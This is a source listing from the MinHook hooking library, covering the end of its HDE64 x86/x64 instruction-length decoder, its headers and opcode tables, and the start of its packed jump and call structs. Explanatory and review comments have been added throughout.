    }

    if (hs->opcode2) {
        /* Two-byte opcodes: a second table at DELTA_PREFIXES holds the prefix
         * bits that make this opcode an error. */
        ht = hde64_table + DELTA_PREFIXES;
        if (ht[ht[opcode / 4] + (opcode % 4)] & pref)
            hs->flags |= F_ERROR | F_ERROR_OPCODE;
    }

    if (cflags & C_MODRM) {
        /* Split ModRM into mod (bits 7-6), reg (bits 5-3) and rm (bits 2-0). */
        hs->flags |= F_MODRM;
        hs->modrm = c = *p++;
        hs->modrm_mod = m_mod = c >> 6;
        hs->modrm_rm = m_rm = c & 7;
        hs->modrm_reg = m_reg = (c & 0x3f) >> 3;

        /* Bit (7 - m_reg) of the group mask set means this reg value is not
         * a valid member of the group. */
        if (x && ((x << m_reg) & 0x80))
            hs->flags |= F_ERROR | F_ERROR_OPCODE;

        /* One-byte opcodes 0xD9..0xDF: pick a mask byte from the FPU tables
         * (by reg and rm when mod == 3, by opcode and reg otherwise) and flag
         * an opcode error when the selected bit is set. */
        if (!hs->opcode2 && opcode >= 0xd9 && opcode <= 0xdf) {
            uint8_t t = opcode - 0xd9;
            if (m_mod == 3) {
                ht = hde64_table + DELTA_FPU_MODRM + t*8;
                t = ht[m_reg] << m_rm;
            } else {
                ht = hde64_table + DELTA_FPU_REG;
                t = ht[t] << m_reg;
            }
            if (t & 0x80)
                hs->flags |= F_ERROR | F_ERROR_OPCODE;
        }

        if (pref & PRE_LOCK) {
            if (m_mod == 3) {
                /* LOCK with a register-form ModRM is always rejected. */
                hs->flags |= F_ERROR | F_ERROR_LOCK;
            } else {
                /* Scan the "LOCK allowed" table of 2-byte records
                 * (opcode, reg mask). For one-byte opcodes the low opcode bit
                 * is cleared before comparing. A hit whose mask bit for
                 * m_reg is clear is accepted; a hit with the bit set, or no
                 * hit at all, is a LOCK error. */
                uint8_t *table_end, op = opcode;
                if (hs->opcode2) {
                    ht = hde64_table + DELTA_OP2_LOCK_OK;
                    table_end = ht + DELTA_OP_ONLY_MEM - DELTA_OP2_LOCK_OK;
                } else {
                    ht = hde64_table + DELTA_OP_LOCK_OK;
                    table_end = ht + DELTA_OP2_LOCK_OK - DELTA_OP_LOCK_OK;
                    op &= -2;
                }
                for (; ht != table_end; ht++)
                    if (*ht++ == op) {
                        if (!((*ht << m_reg) & 0x80))
                            goto no_lock_error;
                        else
                            break;
                    }
                hs->flags |= F_ERROR | F_ERROR_LOCK;
              no_lock_error:
                ;
            }
        }

        /* Operand checks that depend on ModRM.reg. For 0F 20..0F 23 m_mod is
         * forced to 3 first, so no displacement is decoded for them below. */
        if (hs->opcode2) {
            switch (opcode) {
                case 0x20: case 0x22:
                    m_mod = 3;
                    if (m_reg > 4 || m_reg == 1)
                        goto error_operand;
                    else
                        goto no_error_operand;
                case 0x21: case 0x23:
                    m_mod = 3;
                    if (m_reg == 4 || m_reg == 5)
                        goto error_operand;
                    else
                        goto no_error_operand;
            }
        } else {
            switch (opcode) {
                case 0x8c:
                    if (m_reg > 5)
                        goto error_operand;
                    else
                        goto no_error_operand;
                case 0x8e:
                    if (m_reg == 1 || m_reg > 5)
                        goto error_operand;
                    else
                        goto no_error_operand;
            }
        }

        if (m_mod == 3) {
            /* Register form: scan the "memory operand only" table of 3-byte
             * records (opcode, prefix mask, reg mask). It is an operand error
             * when the prefix mask matches pref and the mask bit for m_reg is
             * clear. */
            uint8_t *table_end;
            if (hs->opcode2) {
                ht = hde64_table + DELTA_OP2_ONLY_MEM;
                table_end = ht + sizeof(hde64_table) - DELTA_OP2_ONLY_MEM;
            } else {
                ht = hde64_table + DELTA_OP_ONLY_MEM;
                table_end = ht + DELTA_OP2_ONLY_MEM - DELTA_OP_ONLY_MEM;
            }
            for (; ht != table_end; ht += 2)
                if (*ht++ == opcode) {
                    if (*ht++ & pref && !((*ht << m_reg) & 0x80))
                        goto error_operand;
                    else
                        break;
                }
            goto no_error_operand;
        } else if (hs->opcode2) {
            /* Memory form of a two-byte opcode: these opcode/prefix
             * combinations are rejected. */
            switch (opcode) {
                case 0x50: case 0xd7: case 0xf7:
                    if (pref & (PRE_NONE | PRE_66))
                        goto error_operand;
                    break;
                case 0xd6:
                    if (pref & (PRE_F2 | PRE_F3))
                        goto error_operand;
                    break;
                case 0xc5:
                    goto error_operand;
            }
            goto no_error_operand;
        } else
            goto no_error_operand;

      error_operand:
        hs->flags |= F_ERROR | F_ERROR_OPERAND;
      no_error_operand:

        /* Read the byte after ModRM as a SIB candidate. This read happens
         * even when the instruction has no SIB byte; p is stepped back by the
         * p-- further down. */
        c = *p++;
        /* Opcodes 0xF6 / 0xF7 take an immediate only when ModRM.reg is 0 or
         * 1. */
        if (m_reg <= 1) {
            if (opcode == 0xf6)
                cflags |= C_IMM8;
            else if (opcode == 0xf7)
                cflags |= C_IMM_P66;
        }

        /* Displacement size from mod; with the 0x67 prefix the rm == 6 /
         * 2-byte rules are applied instead of rm == 5 / 4-byte. */
        switch (m_mod) {
            case 0:
                if (pref & PRE_67) {
                    if (m_rm == 6)
                        disp_size = 2;
                } else
                    if (m_rm == 5)
                        disp_size = 4;
                break;
            case 1:
                disp_size = 1;
                break;
            case 2:
                disp_size = 2;
                if (!(pref & PRE_67))
                    disp_size <<= 1;
        }

        /* SIB byte: memory form with rm == 4 (unlike hde32_disasm, the 0x67
         * prefix is not consulted here). A base of 5 with mod 0 or 2 carries
         * a 4-byte displacement. */
        if (m_mod != 3 && m_rm == 4) {
            hs->flags |= F_SIB;
            p++;
            hs->sib = c;
            hs->sib_scale = c >> 6;
            hs->sib_index = (c & 0x3f) >> 3;
            if ((hs->sib_base = c & 7) == 5 && !(m_mod & 1))
                disp_size = 4;
        }

        /* Undo the SIB look-ahead: p now points at the displacement (or at
         * whatever follows ModRM/SIB when there is none). */
        p--;
        switch (disp_size) {
            case 1:
                hs->flags |= F_DISP8;
                hs->disp.disp8 = *p;
                break;
            case 2:
                hs->flags |= F_DISP16;
                hs->disp.disp16 = *(uint16_t *)p;
                break;
            case 4:
                hs->flags |= F_DISP32;
                hs->disp.disp32 = *(uint32_t *)p;
        }
        p += disp_size;
    } else if (pref & PRE_LOCK)
        /* LOCK on an instruction without ModRM is an error. */
        hs->flags |= F_ERROR | F_ERROR_LOCK;

    /* Immediate whose width depends on op64 and the 0x66 prefix: 8 bytes
     * when op64 is set, else 4 bytes without 0x66, else 2 bytes (handled at
     * imm16_ok). Combined with C_REL32 it is a relative target. */
    if (cflags & C_IMM_P66) {
        if (cflags & C_REL32) {
            if (pref & PRE_66) {
                hs->flags |= F_IMM16 | F_RELATIVE;
                hs->imm.imm16 = *(uint16_t *)p;
                p += 2;
                goto disasm_done;
            }
            goto rel32_ok;
        }
        if (op64) {
            hs->flags |= F_IMM64;
            hs->imm.imm64 = *(uint64_t *)p;
            p += 8;
        } else if (!(pref & PRE_66)) {
            hs->flags |= F_IMM32;
            hs->imm.imm32 = *(uint32_t *)p;
            p += 4;
        } else
            goto imm16_ok;
    }


    /* NOTE(review): unlike hde32_disasm, a C_IMM16 value is always written
     * to hs->imm.imm16 here, even when an earlier immediate was stored in
     * the same union -- confirm this is intended. */
    if (cflags & C_IMM16) {
      imm16_ok:
        hs->flags |= F_IMM16;
        hs->imm.imm16 = *(uint16_t *)p;
        p += 2;
    }
    if (cflags & C_IMM8) {
        hs->flags |= F_IMM8;
        hs->imm.imm8 = *p++;
    }

    /* Relative operands are stored in hs->imm and marked F_RELATIVE. */
    if (cflags & C_REL32) {
      rel32_ok:
        hs->flags |= F_IMM32 | F_RELATIVE;
        hs->imm.imm32 = *(uint32_t *)p;
        p += 4;
    } else if (cflags & C_REL8) {
        hs->flags |= F_IMM8 | F_RELATIVE;
        hs->imm.imm8 = *p++;
    }

  disasm_done:

    /* The length limit is enforced only here, after every read has already
     * been performed; an over-long encoding is reported as F_ERROR_LENGTH
     * with len clamped to 15. */
    if ((hs->len = (uint8_t)(p-(uint8_t *)code)) > 15) {
        hs->flags |= F_ERROR | F_ERROR_LENGTH;
        hs->len = 15;
    }

    return (unsigned int)hs->len;
}

--------------------------------------------------------------------------------
/MinHook/src/hde/hde64.h:
--------------------------------------------------------------------------------
/*
 * Hacker Disassembler Engine 64
 * Copyright (c) 2008-2009, Vyacheslav Patkov.
 * All rights reserved.
*
 * hde64.h: C/C++ header file
 *
 */

#ifndef _HDE64_H_
#define _HDE64_H_

/* stdint.h - C99 standard header
 * http://en.wikipedia.org/wiki/stdint.h
 *
 * if your compiler doesn't contain "stdint.h" header (for
 * example, Microsoft Visual C++), you can download file:
 * http://www.azillionmonkeys.com/qed/pstdint.h
 * and change next line to:
 * #include "pstdint.h"
 */
#include "pstdint.h"

/* Bits of hde64s.flags, set by hde64_disasm(). The values of F_DISP8,
 * F_DISP16, F_DISP32 and F_RELATIVE differ from the ones in hde32.h because
 * F_IMM64 takes bit 5 here. */
#define F_MODRM         0x00000001
#define F_SIB           0x00000002
#define F_IMM8          0x00000004
#define F_IMM16         0x00000008
#define F_IMM32         0x00000010
#define F_IMM64         0x00000020
#define F_DISP8         0x00000040
#define F_DISP16        0x00000080
#define F_DISP32        0x00000100
#define F_RELATIVE      0x00000200
#define F_ERROR         0x00001000
#define F_ERROR_OPCODE  0x00002000
#define F_ERROR_LENGTH  0x00004000
#define F_ERROR_LOCK    0x00008000
#define F_ERROR_OPERAND 0x00010000
#define F_PREFIX_REPNZ  0x01000000
#define F_PREFIX_REPX   0x02000000
#define F_PREFIX_REP    0x03000000
#define F_PREFIX_66     0x04000000
#define F_PREFIX_67     0x08000000
#define F_PREFIX_LOCK   0x10000000
#define F_PREFIX_SEG    0x20000000
#define F_PREFIX_REX    0x40000000
#define F_PREFIX_ANY    0x7f000000

/* Prefix byte values as they appear in the instruction stream. */
#define PREFIX_SEGMENT_CS   0x2e
#define PREFIX_SEGMENT_SS   0x36
#define PREFIX_SEGMENT_DS   0x3e
#define PREFIX_SEGMENT_ES   0x26
#define PREFIX_SEGMENT_FS   0x64
#define PREFIX_SEGMENT_GS   0x65
#define PREFIX_LOCK         0xf0
#define PREFIX_REPNZ        0xf2
#define PREFIX_REPX         0xf3
#define PREFIX_OPERAND_SIZE 0x66
#define PREFIX_ADDRESS_SIZE 0x67

#pragma pack(push,1)

/* Result record filled by hde64_disasm(); byte-packed (pack(push,1)). */
typedef struct {
    uint8_t len;        /* bytes consumed, clamped to 15 by hde64_disasm() */
    uint8_t p_rep;      /* 0xf2 or 0xf3 prefix byte if one was seen, else 0 */
    uint8_t p_lock;     /* 0xf0 prefix byte if seen */
    uint8_t p_seg;      /* segment-override prefix byte if seen */
    uint8_t p_66;       /* 0x66 prefix byte if seen */
    uint8_t p_67;       /* 0x67 prefix byte if seen */
    uint8_t rex;        /* NOTE(review): hde64_disasm() in hde64.c never
                           assigns this field, so it keeps the 0 from the
                           zero-fill; use F_PREFIX_REX and rex_w/r/x/b */
    uint8_t rex_w;      /* REX bit 3 */
    uint8_t rex_r;      /* REX bit 2 */
    uint8_t rex_x;      /* REX bit 1 */
    uint8_t rex_b;      /* REX bit 0 */
    uint8_t opcode;     /* first opcode byte */
    uint8_t opcode2;    /* second opcode byte when opcode is 0x0f */
    uint8_t modrm;      /* raw ModRM byte, valid when F_MODRM is set */
    uint8_t modrm_mod;  /* ModRM bits 7-6 */
    uint8_t modrm_reg;  /* ModRM bits 5-3 */
    uint8_t modrm_rm;   /* ModRM bits 2-0 */
    uint8_t sib;        /* raw SIB byte, valid when F_SIB is set */
    uint8_t sib_scale;  /* SIB bits 7-6 */
    uint8_t sib_index;  /* SIB bits 5-3 */
    uint8_t sib_base;   /* SIB bits 2-0 */
    union {
        uint8_t imm8;
        uint16_t imm16;
        uint32_t imm32;
        uint64_t imm64;
    } imm;              /* immediate or relative operand; see F_IMM* / F_RELATIVE */
    union {
        uint8_t disp8;
        uint16_t disp16;
        uint32_t disp32;
    } disp;             /* displacement; see F_DISP* */
    uint32_t flags;     /* F_* bits */
} hde64s;

#pragma pack(pop)

#ifdef __cplusplus
extern "C" {
#endif

/* __cdecl */
unsigned int hde64_disasm(const void *code, hde64s *hs);

#ifdef __cplusplus
}
#endif

#endif /* _HDE64_H_ */

--------------------------------------------------------------------------------
/MinHook/src/hde/pstdint.h:
--------------------------------------------------------------------------------
/*
 * MinHook - The Minimalistic API Hooking Library for x64/x86
 * Copyright (C) 2009-2016 Tsuda Kageyu. All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 *
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
 * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
 * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
 * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
 * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
 * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
 * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
 * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */

#pragma once

// NOTE(review): the header name after #include is missing in this listing,
// probably dropped as an angle-bracket tag during extraction. The typedefs
// below rely on the Windows SDK integer types INT8..UINT64, so the original
// presumably includes <windows.h> here -- confirm against the upstream file.
#include

// Integer types for HDE.
typedef INT8 int8_t;
typedef INT16 int16_t;
typedef INT32 int32_t;
typedef INT64 int64_t;
typedef UINT8 uint8_t;
typedef UINT16 uint16_t;
typedef UINT32 uint32_t;
typedef UINT64 uint64_t;

--------------------------------------------------------------------------------
/MinHook/src/hde/table32.h:
--------------------------------------------------------------------------------
/*
 * Hacker Disassembler Engine 32 C
 * Copyright (c) 2008-2009, Vyacheslav Patkov.
 * All rights reserved.
5 | * 6 | */ 7 | 8 | #define C_NONE 0x00 9 | #define C_MODRM 0x01 10 | #define C_IMM8 0x02 11 | #define C_IMM16 0x04 12 | #define C_IMM_P66 0x10 13 | #define C_REL8 0x20 14 | #define C_REL32 0x40 15 | #define C_GROUP 0x80 16 | #define C_ERROR 0xff 17 | 18 | #define PRE_ANY 0x00 19 | #define PRE_NONE 0x01 20 | #define PRE_F2 0x02 21 | #define PRE_F3 0x04 22 | #define PRE_66 0x08 23 | #define PRE_67 0x10 24 | #define PRE_LOCK 0x20 25 | #define PRE_SEG 0x40 26 | #define PRE_ALL 0xff 27 | 28 | #define DELTA_OPCODES 0x4a 29 | #define DELTA_FPU_REG 0xf1 30 | #define DELTA_FPU_MODRM 0xf8 31 | #define DELTA_PREFIXES 0x130 32 | #define DELTA_OP_LOCK_OK 0x1a1 33 | #define DELTA_OP2_LOCK_OK 0x1b9 34 | #define DELTA_OP_ONLY_MEM 0x1cb 35 | #define DELTA_OP2_ONLY_MEM 0x1da 36 | 37 | unsigned char hde32_table[] = { 38 | 0xa3,0xa8,0xa3,0xa8,0xa3,0xa8,0xa3,0xa8,0xa3,0xa8,0xa3,0xa8,0xa3,0xa8,0xa3, 39 | 0xa8,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xac,0xaa,0xb2,0xaa,0x9f,0x9f, 40 | 0x9f,0x9f,0xb5,0xa3,0xa3,0xa4,0xaa,0xaa,0xba,0xaa,0x96,0xaa,0xa8,0xaa,0xc3, 41 | 0xc3,0x96,0x96,0xb7,0xae,0xd6,0xbd,0xa3,0xc5,0xa3,0xa3,0x9f,0xc3,0x9c,0xaa, 42 | 0xaa,0xac,0xaa,0xbf,0x03,0x7f,0x11,0x7f,0x01,0x7f,0x01,0x3f,0x01,0x01,0x90, 43 | 0x82,0x7d,0x97,0x59,0x59,0x59,0x59,0x59,0x7f,0x59,0x59,0x60,0x7d,0x7f,0x7f, 44 | 0x59,0x59,0x59,0x59,0x59,0x59,0x59,0x59,0x59,0x59,0x59,0x59,0x9a,0x88,0x7d, 45 | 0x59,0x50,0x50,0x50,0x50,0x59,0x59,0x59,0x59,0x61,0x94,0x61,0x9e,0x59,0x59, 46 | 0x85,0x59,0x92,0xa3,0x60,0x60,0x59,0x59,0x59,0x59,0x59,0x59,0x59,0x59,0x59, 47 | 0x59,0x59,0x9f,0x01,0x03,0x01,0x04,0x03,0xd5,0x03,0xcc,0x01,0xbc,0x03,0xf0, 48 | 0x10,0x10,0x10,0x10,0x50,0x50,0x50,0x50,0x14,0x20,0x20,0x20,0x20,0x01,0x01, 49 | 0x01,0x01,0xc4,0x02,0x10,0x00,0x00,0x00,0x00,0x01,0x01,0xc0,0xc2,0x10,0x11, 50 | 0x02,0x03,0x11,0x03,0x03,0x04,0x00,0x00,0x14,0x00,0x02,0x00,0x00,0xc6,0xc8, 51 | 0x02,0x02,0x02,0x02,0x00,0x00,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0xff,0xca, 52 | 
0x01,0x01,0x01,0x00,0x06,0x00,0x04,0x00,0xc0,0xc2,0x01,0x01,0x03,0x01,0xff, 53 | 0xff,0x01,0x00,0x03,0xc4,0xc4,0xc6,0x03,0x01,0x01,0x01,0xff,0x03,0x03,0x03, 54 | 0xc8,0x40,0x00,0x0a,0x00,0x04,0x00,0x00,0x00,0x00,0x7f,0x00,0x33,0x01,0x00, 55 | 0x00,0x00,0x00,0x00,0x00,0xff,0xbf,0xff,0xff,0x00,0x00,0x00,0x00,0x07,0x00, 56 | 0x00,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 57 | 0x00,0xff,0xff,0x00,0x00,0x00,0xbf,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 58 | 0x7f,0x00,0x00,0xff,0x4a,0x4a,0x4a,0x4a,0x4b,0x52,0x4a,0x4a,0x4a,0x4a,0x4f, 59 | 0x4c,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x55,0x45,0x40,0x4a,0x4a,0x4a, 60 | 0x45,0x59,0x4d,0x46,0x4a,0x5d,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a, 61 | 0x4a,0x4a,0x4a,0x4a,0x4a,0x61,0x63,0x67,0x4e,0x4a,0x4a,0x6b,0x6d,0x4a,0x4a, 62 | 0x45,0x6d,0x4a,0x4a,0x44,0x45,0x4a,0x4a,0x00,0x00,0x00,0x02,0x0d,0x06,0x06, 63 | 0x06,0x06,0x0e,0x00,0x00,0x00,0x00,0x06,0x06,0x06,0x00,0x06,0x06,0x02,0x06, 64 | 0x00,0x0a,0x0a,0x07,0x07,0x06,0x02,0x05,0x05,0x02,0x02,0x00,0x00,0x04,0x04, 65 | 0x04,0x04,0x00,0x00,0x00,0x0e,0x05,0x06,0x06,0x06,0x01,0x06,0x00,0x00,0x08, 66 | 0x00,0x10,0x00,0x18,0x00,0x20,0x00,0x28,0x00,0x30,0x00,0x80,0x01,0x82,0x01, 67 | 0x86,0x00,0xf6,0xcf,0xfe,0x3f,0xab,0x00,0xb0,0x00,0xb1,0x00,0xb3,0x00,0xba, 68 | 0xf8,0xbb,0x00,0xc0,0x00,0xc1,0x00,0xc7,0xbf,0x62,0xff,0x00,0x8d,0xff,0x00, 69 | 0xc4,0xff,0x00,0xc5,0xff,0x00,0xff,0xff,0xeb,0x01,0xff,0x0e,0x12,0x08,0x00, 70 | 0x13,0x09,0x00,0x16,0x08,0x00,0x17,0x09,0x00,0x2b,0x09,0x00,0xae,0xff,0x07, 71 | 0xb2,0xff,0x00,0xb4,0xff,0x00,0xb5,0xff,0x00,0xc3,0x01,0x00,0xc7,0xff,0xbf, 72 | 0xe7,0x08,0x00,0xf0,0x02,0x00 73 | }; 74 | -------------------------------------------------------------------------------- /MinHook/src/hde/table64.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Hacker Disassembler Engine 64 C 3 | * Copyright (c) 2008-2009, Vyacheslav Patkov. 4 | * All rights reserved. 
5 | * 6 | */ 7 | 8 | #define C_NONE 0x00 9 | #define C_MODRM 0x01 10 | #define C_IMM8 0x02 11 | #define C_IMM16 0x04 12 | #define C_IMM_P66 0x10 13 | #define C_REL8 0x20 14 | #define C_REL32 0x40 15 | #define C_GROUP 0x80 16 | #define C_ERROR 0xff 17 | 18 | #define PRE_ANY 0x00 19 | #define PRE_NONE 0x01 20 | #define PRE_F2 0x02 21 | #define PRE_F3 0x04 22 | #define PRE_66 0x08 23 | #define PRE_67 0x10 24 | #define PRE_LOCK 0x20 25 | #define PRE_SEG 0x40 26 | #define PRE_ALL 0xff 27 | 28 | #define DELTA_OPCODES 0x4a 29 | #define DELTA_FPU_REG 0xfd 30 | #define DELTA_FPU_MODRM 0x104 31 | #define DELTA_PREFIXES 0x13c 32 | #define DELTA_OP_LOCK_OK 0x1ae 33 | #define DELTA_OP2_LOCK_OK 0x1c6 34 | #define DELTA_OP_ONLY_MEM 0x1d8 35 | #define DELTA_OP2_ONLY_MEM 0x1e7 36 | 37 | unsigned char hde64_table[] = { 38 | 0xa5,0xaa,0xa5,0xb8,0xa5,0xaa,0xa5,0xaa,0xa5,0xb8,0xa5,0xb8,0xa5,0xb8,0xa5, 39 | 0xb8,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xac,0xc0,0xcc,0xc0,0xa1,0xa1, 40 | 0xa1,0xa1,0xb1,0xa5,0xa5,0xa6,0xc0,0xc0,0xd7,0xda,0xe0,0xc0,0xe4,0xc0,0xea, 41 | 0xea,0xe0,0xe0,0x98,0xc8,0xee,0xf1,0xa5,0xd3,0xa5,0xa5,0xa1,0xea,0x9e,0xc0, 42 | 0xc0,0xc2,0xc0,0xe6,0x03,0x7f,0x11,0x7f,0x01,0x7f,0x01,0x3f,0x01,0x01,0xab, 43 | 0x8b,0x90,0x64,0x5b,0x5b,0x5b,0x5b,0x5b,0x92,0x5b,0x5b,0x76,0x90,0x92,0x92, 44 | 0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x6a,0x73,0x90, 45 | 0x5b,0x52,0x52,0x52,0x52,0x5b,0x5b,0x5b,0x5b,0x77,0x7c,0x77,0x85,0x5b,0x5b, 46 | 0x70,0x5b,0x7a,0xaf,0x76,0x76,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b, 47 | 0x5b,0x5b,0x86,0x01,0x03,0x01,0x04,0x03,0xd5,0x03,0xd5,0x03,0xcc,0x01,0xbc, 48 | 0x03,0xf0,0x03,0x03,0x04,0x00,0x50,0x50,0x50,0x50,0xff,0x20,0x20,0x20,0x20, 49 | 0x01,0x01,0x01,0x01,0xc4,0x02,0x10,0xff,0xff,0xff,0x01,0x00,0x03,0x11,0xff, 50 | 0x03,0xc4,0xc6,0xc8,0x02,0x10,0x00,0xff,0xcc,0x01,0x01,0x01,0x00,0x00,0x00, 51 | 0x00,0x01,0x01,0x03,0x01,0xff,0xff,0xc0,0xc2,0x10,0x11,0x02,0x03,0x01,0x01, 52 | 
0x01,0xff,0xff,0xff,0x00,0x00,0x00,0xff,0x00,0x00,0xff,0xff,0xff,0xff,0x10, 53 | 0x10,0x10,0x10,0x02,0x10,0x00,0x00,0xc6,0xc8,0x02,0x02,0x02,0x02,0x06,0x00, 54 | 0x04,0x00,0x02,0xff,0x00,0xc0,0xc2,0x01,0x01,0x03,0x03,0x03,0xca,0x40,0x00, 55 | 0x0a,0x00,0x04,0x00,0x00,0x00,0x00,0x7f,0x00,0x33,0x01,0x00,0x00,0x00,0x00, 56 | 0x00,0x00,0xff,0xbf,0xff,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0xff,0x00, 57 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff, 58 | 0x00,0x00,0x00,0xbf,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x7f,0x00,0x00, 59 | 0xff,0x40,0x40,0x40,0x40,0x41,0x49,0x40,0x40,0x40,0x40,0x4c,0x42,0x40,0x40, 60 | 0x40,0x40,0x40,0x40,0x40,0x40,0x4f,0x44,0x53,0x40,0x40,0x40,0x44,0x57,0x43, 61 | 0x5c,0x40,0x60,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40, 62 | 0x40,0x40,0x64,0x66,0x6e,0x6b,0x40,0x40,0x6a,0x46,0x40,0x40,0x44,0x46,0x40, 63 | 0x40,0x5b,0x44,0x40,0x40,0x00,0x00,0x00,0x00,0x06,0x06,0x06,0x06,0x01,0x06, 64 | 0x06,0x02,0x06,0x06,0x00,0x06,0x00,0x0a,0x0a,0x00,0x00,0x00,0x02,0x07,0x07, 65 | 0x06,0x02,0x0d,0x06,0x06,0x06,0x0e,0x05,0x05,0x02,0x02,0x00,0x00,0x04,0x04, 66 | 0x04,0x04,0x05,0x06,0x06,0x06,0x00,0x00,0x00,0x0e,0x00,0x00,0x08,0x00,0x10, 67 | 0x00,0x18,0x00,0x20,0x00,0x28,0x00,0x30,0x00,0x80,0x01,0x82,0x01,0x86,0x00, 68 | 0xf6,0xcf,0xfe,0x3f,0xab,0x00,0xb0,0x00,0xb1,0x00,0xb3,0x00,0xba,0xf8,0xbb, 69 | 0x00,0xc0,0x00,0xc1,0x00,0xc7,0xbf,0x62,0xff,0x00,0x8d,0xff,0x00,0xc4,0xff, 70 | 0x00,0xc5,0xff,0x00,0xff,0xff,0xeb,0x01,0xff,0x0e,0x12,0x08,0x00,0x13,0x09, 71 | 0x00,0x16,0x08,0x00,0x17,0x09,0x00,0x2b,0x09,0x00,0xae,0xff,0x07,0xb2,0xff, 72 | 0x00,0xb4,0xff,0x00,0xb5,0xff,0x00,0xc3,0x01,0x00,0xc7,0xff,0xbf,0xe7,0x08, 73 | 0x00,0xf0,0x02,0x00 74 | }; 75 | -------------------------------------------------------------------------------- /MinHook/src/trampoline.h: -------------------------------------------------------------------------------- 1 | /* 2 | * MinHook - The Minimalistic API Hooking Library for x64/x86 3 | 
* Copyright (C) 2009-2016 Tsuda Kageyu. 4 | * All rights reserved. 5 | * 6 | * Redistribution and use in source and binary forms, with or without 7 | * modification, are permitted provided that the following conditions 8 | * are met: 9 | * 10 | * 1. Redistributions of source code must retain the above copyright 11 | * notice, this list of conditions and the following disclaimer. 12 | * 2. Redistributions in binary form must reproduce the above copyright 13 | * notice, this list of conditions and the following disclaimer in the 14 | * documentation and/or other materials provided with the distribution. 15 | * 16 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 17 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 18 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A 19 | * PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER 20 | * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 21 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 22 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR 23 | * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF 24 | * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING 25 | * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 26 | * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 27 | */ 28 | 29 | #pragma once 30 | 31 | #pragma pack(push, 1) 32 | 33 | // Structs for writing x86/x64 instructions. 34 | 35 | // 8-bit relative jump. 36 | typedef struct _JMP_REL_SHORT 37 | { 38 | UINT8 opcode; // EB xx: JMP +2+xx 39 | UINT8 operand; 40 | } JMP_REL_SHORT, *PJMP_REL_SHORT; 41 | 42 | // 32-bit direct relative jump/call. 
// Layout note: every struct below, up to #pragma pack(pop), is declared under
// 1-byte packing, so the field sizes add up to the exact length of the encoded
// instruction sequence described in the per-field comments. Field order is the
// byte order of the encoding and must not be rearranged.

// 32-bit direct relative jump/call (5 bytes: 1 opcode + 4 displacement).
// CALL_REL is an alias of the same layout; only the opcode byte differs.
typedef struct _JMP_REL
{
    UINT8  opcode;      // E9/E8 xxxxxxxx: JMP/CALL +5+xxxxxxxx
    UINT32 operand;     // Relative destination address
} JMP_REL, *PJMP_REL, CALL_REL;

// 64-bit indirect absolute jump (14 bytes: 6-byte instruction followed by the
// 8-byte pointer it dereferences).
typedef struct _JMP_ABS
{
    UINT8  opcode0;     // FF25 00000000: JMP [+6]
    UINT8  opcode1;
    UINT32 dummy;       // displacement part of the encoding shown above
    UINT64 address;     // Absolute destination address
} JMP_ABS, *PJMP_ABS;

// 64-bit indirect absolute call (16 bytes: 6-byte call, 2-byte short jump that
// steps over the pointer, then the 8-byte pointer).
typedef struct _CALL_ABS
{
    UINT8  opcode0;     // FF15 00000002: CALL [+6]
    UINT8  opcode1;
